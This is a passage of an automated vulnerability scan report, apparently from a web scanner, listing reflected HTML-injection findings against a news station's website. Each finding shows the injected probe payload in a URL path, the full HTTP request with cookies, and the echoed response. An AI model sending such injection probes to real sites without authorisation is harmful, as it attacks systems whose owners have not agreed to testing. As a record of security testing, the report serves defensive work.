This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /features/articles/dish/BO144833605d8"><a>2ca3bfe2d55/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:46 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 1
Cache-Control: max-age=7150
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 23:56:06 GMT
Content-Type: text/html; charset=ISO-8859-1
Via: 1.1 dfw107010 (MII-APC/1.6)
Connection: close
Content-Length: 11914

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>The Dish - </title>
<meta name="publisher" content="New England News Station Boston
...[SNIP]...
<a href="javascript:void(0);" onclick="ShareLink(this,'http://www.whdh.com/features/articles/dish/BO144833605d8\"><a>2ca3bfe2d55/','')" onmouseout="ShareLinkClose()">
...[SNIP]...

4.1865. http://www1.whdh.com/features/articles/hank/BO144372/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www1.whdh.com
Path:   /features/articles/hank/BO144372/

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e53b"><a>d8417674324 was submitted in the REST URL parameter 4. This input was echoed as 4e53b\"><a>d8417674324 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /features/articles/hank/BO1443724e53b"><a>d8417674324/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:58:14 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 1
Cache-Control: max-age=7150
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 23:56:34 GMT
Content-Type: text/html; charset=ISO-8859-1
Via: 1.1 dfw107003 (MII-APC/1.6)
Connection: close
Content-Length: 11959

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Hank Investigates - </title>
<meta name="publisher" content="New England News Statio
...[SNIP]...
<a href="javascript:void(0);" onclick="ShareLink(this,'http://www.whdh.com/features/articles/hank/BO1443724e53b\"><a>d8417674324/','')" onmouseout="ShareLinkClose()">
...[SNIP]...

4.1866. http://www1.whdh.com/features/articles/hank/BO144452/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www1.whdh.com
Path:   /features/articles/hank/BO144452/

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8cc43"><a>00199ee1503 was submitted in the REST URL parameter 4. This input was echoed as 8cc43\"><a>00199ee1503 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /features/articles/hank/BO1444528cc43"><a>00199ee1503/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:58:12 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=7151
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 23:56:34 GMT
Content-Type: text/html; charset=ISO-8859-1
Via: 1.1 dfw107010 (MII-APC/1.6)
Connection: close
Content-Length: 11959

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Hank Investigates - </title>
<meta name="publisher" content="New England News Statio
...[SNIP]...
<a href="javascript:void(0);" onclick="ShareLink(this,'http://www.whdh.com/features/articles/hank/BO1444528cc43\"><a>00199ee1503/','')" onmouseout="ShareLinkClose()">
...[SNIP]...

4.1867. http://www1.whdh.com/features/articles/hank/BO144489/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www1.whdh.com
Path:   /features/articles/hank/BO144489/

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5e60"><a>d738f217fec was submitted in the REST URL parameter 4. This input was echoed as e5e60\"><a>d738f217fec in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /features/articles/hank/BO144489e5e60"><a>d738f217fec/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:58:12 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=7150
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 23:56:32 GMT
Content-Type: text/html; charset=ISO-8859-1
Via: 1.1 dfw107010 (MII-APC/1.6)
Connection: close
Content-Length: 11959

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Hank Investigates - </title>
<meta name="publisher" content="New England News Statio
...[SNIP]...
<a href="javascript:void(0);" onclick="ShareLink(this,'http://www.whdh.com/features/articles/hank/BO144489e5e60\"><a>d738f217fec/','')" onmouseout="ShareLinkClose()">
...[SNIP]...

4.1868. http://www1.whdh.com/features/articles/hank/BO144588/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www1.whdh.com
Path:   /features/articles/hank/BO144588/

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 258ae"><a>2a536c67b5b was submitted in the REST URL parameter 4. This input was echoed as 258ae\"><a>2a536c67b5b in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /features/articles/hank/BO144588258ae"><a>2a536c67b5b/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:58:12 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=7150
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 23:56:32 GMT
Content-Type: text/html; charset=ISO-8859-1
Via: 1.1 dfw107007 (MII-APC/1.6)
Connection: close
Content-Length: 11959

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Hank Investigates - </title>
<meta name="publisher" content="New England News Statio
...[SNIP]...
<a href="javascript:void(0);" onclick="ShareLink(this,'http://www.whdh.com/features/articles/hank/BO144588258ae\"><a>2a536c67b5b/','')" onmouseout="ShareLinkClose()">
...[SNIP]...

4.1869. http://www1.whdh.com/features/articles/hiller/BO144771/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www1.whdh.com
Path:   /features/articles/hiller/BO144771/

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33552"><a>1e0ed6ad923 was submitted in the REST URL parameter 4. This input was echoed as 33552\"><a>1e0ed6ad923 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /features/articles/hiller/BO14477133552"><a>1e0ed6ad923/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:57 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=7150
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 23:56:17 GMT
Content-Type: text/html; charset=ISO-8859-1
Via: 1.1 dfw107007 (MII-APC/1.6)
Connection: close
Content-Length: 11981

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>The Hiller Instinct - </title>
<meta name="publisher" content="New England News Stat
...[SNIP]...
<a href="javascript:void(0);" onclick="ShareLink(this,'http://www.whdh.com/features/articles/hiller/BO14477133552\"><a>1e0ed6ad923/','')" onmouseout="ShareLinkClose()">
...[SNIP]...

4.1870. http://www1.whdh.com/features/articles/hiller/BO144776/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www1.whdh.com
Path:   /features/articles/hiller/BO144776/

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 425a7"><a>418a61b9cc5 was submitted in the REST URL parameter 4. This input was echoed as 425a7\"><a>418a61b9cc5 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /features/articles/hiller/BO144776425a7"><a>418a61b9cc5/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:56 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=7151
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 23:56:18 GMT
Content-Type: text/html; charset=ISO-8859-1
Via: 1.1 dfw107007 (MII-APC/1.6)
Connection: close
Content-Length: 11981

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>The Hiller Instinct - </title>
<meta name="publisher" content="New England News Stat
...[SNIP]...
<a href="javascript:void(0);" onclick="ShareLink(this,'http://www.whdh.com/features/articles/hiller/BO144776425a7\"><a>418a61b9cc5/','')" onmouseout="ShareLinkClose()">
...[SNIP]...

4.1871. http://www1.whdh.com/features/articles/hiller/BO144796/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www1.whdh.com
Path:   /features/articles/hiller/BO144796/

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 359b8"><a>9f425241799 was submitted in the REST URL parameter 4. This input was echoed as 359b8\"><a>9f425241799 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /features/articles/hiller/BO144796359b8"><a>9f425241799/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:54 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=7150
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 23:56:15 GMT
Content-Type: text/html; charset=ISO-8859-1
Via: 1.1 dfw107010 (MII-APC/1.6)
Connection: close
Content-Length: 11981

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>The Hiller Instinct - </title>
<meta name="publisher" content="New England News Stat
...[SNIP]...
<a href="javascript:void(0);" onclick="ShareLink(this,'http://www.whdh.com/features/articles/hiller/BO144796359b8\"><a>9f425241799/','')" onmouseout="ShareLinkClose()">
...[SNIP]...

4.1872. http://www1.whdh.com/features/articles/hiller/BO144813/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www1.whdh.com
Path:   /features/articles/hiller/BO144813/

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86139"><a>0a3ffc39662 was submitted in the REST URL parameter 4. This input was echoed as 86139\"><a>0a3ffc39662 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /features/articles/hiller/BO14481386139"><a>0a3ffc39662/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:54 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 1
Cache-Control: max-age=7150
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 23:56:14 GMT
Content-Type: text/html; charset=ISO-8859-1
Via: 1.1 dfw107005 (MII-APC/1.6)
Connection: close
Content-Length: 11981

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>The Hiller Instinct - </title>
<meta name="publisher" content="New England News Stat
...[SNIP]...
<a href="javascript:void(0);" onclick="ShareLink(this,'http://www.whdh.com/features/articles/hiller/BO14481386139\"><a>0a3ffc39662/','')" onmouseout="ShareLinkClose()">
...[SNIP]...

4.1873. http://www1.whdh.com/features/articles/hiller/BO144841/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www1.whdh.com
Path:   /features/articles/hiller/BO144841/

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 73919"><a>f70591e73e1 was submitted in the REST URL parameter 4. This input was echoed as 73919\"><a>f70591e73e1 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /features/articles/hiller/BO14484173919"><a>f70591e73e1/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:51 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=7150
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 23:56:12 GMT
Content-Type: text/html; charset=ISO-8859-1
Via: 1.1 dfw107010 (MII-APC/1.6)
Connection: close
Content-Length: 11981

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>The Hiller Instinct - </title>
<meta name="publisher" content="New England News Stat
...[SNIP]...
<a href="javascript:void(0);" onclick="ShareLink(this,'http://www.whdh.com/features/articles/hiller/BO14484173919\"><a>f70591e73e1/','')" onmouseout="ShareLinkClose()">
...[SNIP]...

4.1874. http://www1.whdh.com/features/articles/holiday_helping/BO144709/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www1.whdh.com
Path:   /features/articles/holiday_helping/BO144709/

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 858e5"><a>f396a0cf518 was submitted in the REST URL parameter 4. This input was echoed as 858e5\"><a>f396a0cf518 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /features/articles/holiday_helping/BO144709858e5"><a>f396a0cf518/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:58:07 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=7150
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 23:56:27 GMT
Content-Type: text/html; charset=ISO-8859-1
Via: 1.1 dfw107006 (MII-APC/1.6)
Connection: close
Content-Length: 12009

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Holiday Helping - </title>
<meta name="publisher" content="New England News Station
...[SNIP]...
<a href="javascript:void(0);" onclick="ShareLink(this,'http://www.whdh.com/features/articles/holiday_helping/BO144709858e5\"><a>f396a0cf518/','')" onmouseout="ShareLinkClose()">
...[SNIP]...

4.1875. http://www1.whdh.com/features/articles/holiday_helping/BO144719/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www1.whdh.com
Path:   /features/articles/holiday_helping/BO144719/

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0875"><a>c7bf7737f8f was submitted in the REST URL parameter 4. This input was echoed as d0875\"><a>c7bf7737f8f in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /features/articles/holiday_helping/BO144719d0875"><a>c7bf7737f8f/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:58:06 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=7150
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 23:56:27 GMT
Content-Type: text/html; charset=ISO-8859-1
Via: 1.1 dfw107003 (MII-APC/1.6)
Connection: close
Content-Length: 12009

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Holiday Helping - </title>
<meta name="publisher" content="New England News Station
...[SNIP]...
<a href="javascript:void(0);" onclick="ShareLink(this,'http://www.whdh.com/features/articles/holiday_helping/BO144719d0875\"><a>c7bf7737f8f/','')" onmouseout="ShareLinkClose()">
...[SNIP]...

4.1876. http://www1.whdh.com/features/articles/holiday_helping/BO144727/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www1.whdh.com
Path:   /features/articles/holiday_helping/BO144727/

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b13e8"><a>1fc488627eb was submitted in the REST URL parameter 4. This input was echoed as b13e8\"><a>1fc488627eb in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /features/articles/holiday_helping/BO144727b13e8"><a>1fc488627eb/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:59 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=7151
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 23:56:21 GMT
Content-Type: text/html; charset=ISO-8859-1
Via: 1.1 dfw107022 (MII-APC/1.6)
Connection: close
Content-Length: 12009

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Holiday Helping - </title>
<meta name="publisher" content="New England News Station
...[SNIP]...
<a href="javascript:void(0);" onclick="ShareLink(this,'http://www.whdh.com/features/articles/holiday_helping/BO144727b13e8\"><a>1fc488627eb/','')" onmouseout="ShareLinkClose()">
...[SNIP]...

4.1877. http://www1.whdh.com/features/articles/holiday_helping/BO144733/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www1.whdh.com
Path:   /features/articles/holiday_helping/BO144733/

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e840b"><a>5b88da6bb42 was submitted in the REST URL parameter 4. This input was echoed as e840b\"><a>5b88da6bb42 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /features/articles/holiday_helping/BO144733e840b"><a>5b88da6bb42/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:57 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=7150
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 23:56:17 GMT
Content-Type: text/html; charset=ISO-8859-1
Via: 1.1 dfw107022 (MII-APC/1.6)
Connection: close
Content-Length: 12009

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Holiday Helping - </title>
<meta name="publisher" content="New England News Station
...[SNIP]...
<a href="javascript:void(0);" onclick="ShareLink(this,'http://www.whdh.com/features/articles/holiday_helping/BO144733e840b\"><a>5b88da6bb42/','')" onmouseout="ShareLinkClose()">
...[SNIP]...

